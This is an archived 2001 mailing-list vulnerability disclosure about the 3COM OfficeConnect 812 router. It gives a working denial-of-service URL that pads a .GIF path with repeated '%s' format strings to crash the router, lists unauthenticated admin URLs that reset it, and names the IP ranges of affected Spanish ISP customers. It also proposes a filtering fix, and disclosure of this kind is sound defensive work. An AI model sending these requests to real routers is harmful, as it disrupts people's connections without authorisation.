Yesterday night I discovered a vulnerabilty. The router is a 3COM OfficeConnect 812 and the vulnerability is on the HTTP server, on port 80. When you enter with a browser on one of this router, you are asked for user/password, if you fail, you can see a web page telling you that is a protected objetct, but you have a .GIF file you have access to and you dont need to put the .GIF. http://192.168.1.254/graphics/sml3com well... you put this, and you see the image... well.... lets add a long string later Exploit: -------- http://192.168.1.254/graphics/sml3com%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s% s%s%s%s%s%s%s%s%s%%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s %s%s%s%s%s%s%s ...the router causes an NMI, red lights, flashing lights... and it's dead... it disconnect and come online again on a minute. 3COM OfficeConnect 812 is the router that Terra (from Telefonica Spain) puts on almost DSL connections, even for all short of businness. They are selling now this router even when is a better firmware (not tested yet) that maybe resolve this problem. Solution: put filters to the router to the remote sites and only allow connections to 23 and 80 from local network. If you're spanish, take care cos your IP is fixed and you have a very "clear" domain 195.255.*.* and 217.97.*.* Not Copyrighted by UnMateria - May 2001 :-) ANNEX: http://192.168.1.254/adsl_pair_select http://192.168.1.254/adsl_reset Very unsecure for strangers ;-)... the server here doesnt ask for password so you cant reset the router from the own web (and without credentials)
This archive was generated by hypermail 2b30 : Tue May 15 2001 - 12:03:08 PDT